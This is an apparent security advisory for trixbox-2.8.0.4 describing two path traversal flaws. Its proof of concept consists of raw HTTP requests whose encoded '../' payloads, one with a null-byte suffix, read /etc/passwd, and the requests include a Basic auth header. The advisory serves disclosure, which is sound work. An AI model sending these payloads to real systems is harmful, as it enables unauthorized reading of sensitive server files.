#236 TrixBox Multiple Path Traversal Vulnerabilities

[sachin]

TrixBox Multiple Path Traversal Vulnerabilities

---

Vulnerability Title: TrixBox Multiple Path Traversal Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2 Base Score: (AV:N/AC:M/Au:S/C:C/I:N/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)

---

Description:
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. (Source: OWASP).
Impact:
Remote attackers may use a specially crafted request with directory-traversal sequences ('../') to retrieve sensitive information.

Proof-of-Concept:

• Affected Request -1:

POST /maint/index.php?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.6/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive

xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages

• Affected Request -2:

GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Please fix it ASAP.

Credit:
Sachin Wagh (@tiger_tigerboy)